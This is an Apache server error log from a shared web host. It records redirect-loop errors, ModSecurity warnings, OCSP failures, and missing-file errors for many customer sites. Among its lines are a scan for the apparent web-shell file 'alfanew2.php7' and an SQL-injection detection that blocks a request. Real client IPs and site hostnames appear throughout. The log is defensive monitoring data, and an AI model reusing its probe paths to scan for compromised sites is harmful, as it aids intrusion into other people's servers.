[Mon May 11 23:43:55.627791 2026] [core:error] [pid 1590352:tid 1590396] [client 91.224.92.99:65023] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.776921 2026] [core:error] [pid 1606352:tid 1606419] [client 91.224.92.99:53026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.780231 2026] [core:error] [pid 1606352:tid 1606419] [client 91.224.92.99:53026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.948336 2026] [core:error] [pid 1588898:tid 1588913] [client 91.224.92.99:56931] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:55.948365 2026] [core:error] [pid 1588898:tid 1588913] [client 91.224.92.99:56931] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.125273 2026] [core:error] [pid 1601130:tid 1601158] [client 91.224.92.99:50134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.125301 2026] [core:error] [pid 1601130:tid 1601158] [client 91.224.92.99:50134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.306725 2026] [core:error] [pid 1630927:tid 1630936] [client 91.224.92.99:63539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.310745 2026] [core:error] [pid 1630927:tid 1630936] [client 91.224.92.99:63539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.950720 2026] [core:error] [pid 1606352:tid 1606422] [client 91.224.92.99:50595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:56.951049 2026] [core:error] [pid 1606352:tid 1606422] [client 91.224.92.99:50595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.138592 2026] [core:error] [pid 1630927:tid 1630939] [client 91.224.92.99:59156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.138640 2026] [core:error] [pid 1630927:tid 1630939] [client 91.224.92.99:59156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.290058 2026] [core:error] [pid 1601130:tid 1601167] [client 91.224.92.99:61831] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.290083 2026] [core:error] [pid 1601130:tid 1601167] [client 91.224.92.99:61831] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.474803 2026] [core:error] [pid 1630927:tid 1630938] [client 91.224.92.99:52349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.474835 2026] [core:error] [pid 1630927:tid 1630938] [client 91.224.92.99:52349] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.677601 2026] [core:error] [pid 1590352:tid 1590410] [client 91.224.92.99:58670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.677631 2026] [core:error] [pid 1590352:tid 1590410] [client 91.224.92.99:58670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.827455 2026] [core:error] [pid 1605480:tid 1605526] [client 91.224.92.99:49486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:57.830717 2026] [core:error] [pid 1605480:tid 1605526] [client 91.224.92.99:49486] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.001215 2026] [core:error] [pid 1588898:tid 1588916] [client 91.224.92.99:62704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.001251 2026] [core:error] [pid 1588898:tid 1588916] [client 91.224.92.99:62704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.179091 2026] [core:error] [pid 1630927:tid 1630950] [client 91.224.92.99:54576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.179120 2026] [core:error] [pid 1630927:tid 1630950] [client 91.224.92.99:54576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.347589 2026] [core:error] [pid 1606352:tid 1606421] [client 91.224.92.99:62462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.347617 2026] [core:error] [pid 1606352:tid 1606421] [client 91.224.92.99:62462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.539398 2026] [core:error] [pid 1588898:tid 1588921] [client 91.224.92.99:65398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.539528 2026] [core:error] [pid 1588898:tid 1588921] [client 91.224.92.99:65398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.707441 2026] [core:error] [pid 1601130:tid 1601165] [client 91.224.92.99:51709] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:58.707475 2026] [core:error] [pid 1601130:tid 1601165] [client 91.224.92.99:51709] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.440557 2026] [core:error] [pid 1605480:tid 1605523] [client 91.224.92.99:53673] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.440586 2026] [core:error] [pid 1605480:tid 1605523] [client 91.224.92.99:53673] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.651641 2026] [core:error] [pid 1601130:tid 1601166] [client 91.224.92.99:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.651667 2026] [core:error] [pid 1601130:tid 1601166] [client 91.224.92.99:55768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.837890 2026] [core:error] [pid 1590352:tid 1590394] [client 91.224.92.99:55127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:43:59.837924 2026] [core:error] [pid 1590352:tid 1590394] [client 91.224.92.99:55127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.018533 2026] [core:error] [pid 1605480:tid 1605538] [client 91.224.92.99:58031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.018580 2026] [core:error] [pid 1605480:tid 1605538] [client 91.224.92.99:58031] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.186852 2026] [core:error] [pid 1590352:tid 1590404] [client 91.224.92.99:51664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.186889 2026] [core:error] [pid 1590352:tid 1590404] [client 91.224.92.99:51664] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.351900 2026] [core:error] [pid 1606352:tid 1606423] [client 91.224.92.99:53434] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.352106 2026] [core:error] [pid 1606352:tid 1606423] [client 91.224.92.99:53434] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.515355 2026] [core:error] [pid 1588898:tid 1588919] [client 91.224.92.99:58767] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.515394 2026] [core:error] [pid 1588898:tid 1588919] [client 91.224.92.99:58767] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.691671 2026] [core:error] [pid 1601130:tid 1601155] [client 91.224.92.99:60367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.691826 2026] [core:error] [pid 1601130:tid 1601155] [client 91.224.92.99:60367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.855937 2026] [core:error] [pid 1590352:tid 1590401] [client 91.224.92.99:56159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:00.855969 2026] [core:error] [pid 1590352:tid 1590401] [client 91.224.92.99:56159] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:01.048768 2026] [core:error] [pid 1606352:tid 1606429] [client 91.224.92.99:52946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:01.048811 2026] [core:error] [pid 1606352:tid 1606429] [client 91.224.92.99:52946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:01.232772 2026] [core:error] [pid 1588898:tid 1588920] [client 91.224.92.99:54812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:01.232806 2026] [core:error] [pid 1588898:tid 1588920] [client 91.224.92.99:54812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:44:30.429998 2026] [security2:error] [pid 1588898:tid 1588912] [client 43.131.45.213:46858] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2020/05/304-Coup"] [unique_id "agJNvqFW67LJTsgN3jQnWgAAAA0"]
[Mon May 11 23:44:59.293566 2026] [security2:error] [pid 1590352:tid 1590392] [client 43.160.219.138:48604] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/cession-reprise-dentreprise-en-difficulte/"] [unique_id "agJN261q0G_aXAqWauQVyAAAAIA"]
[Mon May 11 23:45:04.251541 2026] [security2:error] [pid 1601130:tid 1601161] [client 170.106.187.106:35624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/wp-json/"] [unique_id "agJN4HEgAO_835W6c1myFgAAAEs"]
[Mon May 11 23:45:45.489195 2026] [security2:error] [pid 1605480:tid 1605534] [client 101.33.66.34:42078] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/douche/"] [unique_id "agJOCR2Cvzd_nyNfUm8awgAAAQw"]
[Mon May 11 23:45:51.325618 2026] [security2:error] [pid 1590352:tid 1590405] [client 43.156.43.123:52382] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-est-sur-instagram/"] [unique_id "agJOD61q0G_aXAqWauQWGAAAAI0"]
[Mon May 11 23:45:59.282852 2026] [security2:error] [pid 1601130:tid 1601154] [client 43.156.202.34:49972] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/domotique/home-assistant/"] [unique_id "agJOF3EgAO_835W6c1myWAAAAEQ"]
[Mon May 11 23:46:14.034894 2026] [security2:error] [pid 1588898:tid 1588917] [client 43.157.158.178:38794] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJOJqFW67LJTsgN3jQn1AAAABI"]
[Mon May 11 23:46:14.630791 2026] [ssl:error] [pid 1590352:tid 1590404] (EAI 2)Name or service not known: [client 199.45.154.159:50008] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:14.631002 2026] [ssl:error] [pid 1590352:tid 1590404] AH01941: stapling_renew_response: responder error
[Mon May 11 23:46:18.595162 2026] [ssl:error] [pid 1601130:tid 1601174] (EAI 2)Name or service not known: [client 199.45.154.159:44958] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:18.595213 2026] [ssl:error] [pid 1601130:tid 1601174] AH01941: stapling_renew_response: responder error
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Mon May 11 23:46:22.605931 2026] [security2:error] [pid 1606352:tid 1606423] [client 43.157.158.178:48374] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJOLno_DFxNSZVmaX3rdQAAAMQ"], referer: http://pole-de-mobilite-regional.com
[Mon May 11 23:46:22.884164 2026] [ssl:error] [pid 1605480:tid 1605540] (EAI 2)Name or service not known: [client 199.45.154.159:44964] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:22.884237 2026] [ssl:error] [pid 1605480:tid 1605540] AH01941: stapling_renew_response: responder error
[Mon May 11 23:46:26.710407 2026] [ssl:error] [pid 1605480:tid 1605536] (EAI 2)Name or service not known: [client 199.45.154.159:44974] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:26.710443 2026] [ssl:error] [pid 1605480:tid 1605536] AH01941: stapling_renew_response: responder error
[Mon May 11 23:46:30.036268 2026] [:error] [pid 1590352:tid 1590395] [client 187.108.12.218:18563] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:46:33.211581 2026] [ssl:error] [pid 1630927:tid 1630941] (EAI 2)Name or service not known: [client 199.45.154.159:58038] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:33.211629 2026] [ssl:error] [pid 1630927:tid 1630941] AH01941: stapling_renew_response: responder error
[Mon May 11 23:46:48.029601 2026] [ssl:error] [pid 1605480:tid 1605546] (EAI 2)Name or service not known: [client 199.45.154.159:35744] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:46:48.029748 2026] [ssl:error] [pid 1605480:tid 1605546] AH01941: stapling_renew_response: responder error
[Mon May 11 23:48:10.289846 2026] [security2:error] [pid 1606352:tid 1606433] [client 129.226.94.52:39894] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/lebonheurextr4.mp3"] [unique_id "agJOmno_DFxNSZVmaX3r5wAAAM4"]
[Mon May 11 23:48:32.610461 2026] [:error] [pid 1605480:tid 1605522] [client 4.193.137.131:10182] File does not exist: /home/cultures/public_html/alfanew2.php7
[Mon May 11 23:48:59.444413 2026] [security2:error] [pid 1605480:tid 1605539] [client 43.130.72.177:55198] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/user/passwordforgotten.php"] [unique_id "agJOyx2Cvzd_nyNfUm8b-QAAARE"]
[Mon May 11 23:49:04.872943 2026] [security2:error] [pid 1590352:tid 1590398] [client 43.155.140.157:42526] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agJO0K1q0G_aXAqWauQXcAAAAIY"]
[Mon May 11 23:49:14.800753 2026] [:error] [pid 1605480:tid 1605533] [client 52.167.144.220:44638] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 23:49:43.549191 2026] [security2:error] [pid 1630927:tid 1630935] [client 114.119.141.34:54157] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d92c5c6b22c1ba4685a776eb4cc504f9||1778537977||1778537617"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2023/12/Rent-Paradise-Lodge-Caraibe-exterieur.jpg"] [unique_id "agJO92iGYYhUwDaJINmp6QAAAUU"], referer: https://rentparadise.fr/accommodation-category/lodges
[Mon May 11 23:49:43.549676 2026] [security2:error] [pid 1630927:tid 1630935] [client 114.119.141.34:54157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2023/12/Rent-Paradise-Lodge-Caraibe-exterieur.jpg"] [unique_id "agJO92iGYYhUwDaJINmp6QAAAUU"], referer: https://rentparadise.fr/accommodation-category/lodges
[Mon May 11 23:49:45.044333 2026] [security2:error] [pid 1630927:tid 1630935] [client 114.119.141.34:54157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJO92iGYYhUwDaJINmp6QAAAUU"], referer: https://rentparadise.fr/accommodation-category/lodges
[Mon May 11 23:50:03.033474 2026] [security2:error] [pid 1588898:tid 1588912] [client 43.164.129.191:49088] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agJPC6FW67LJTsgN3jQo4AAAAA0"]
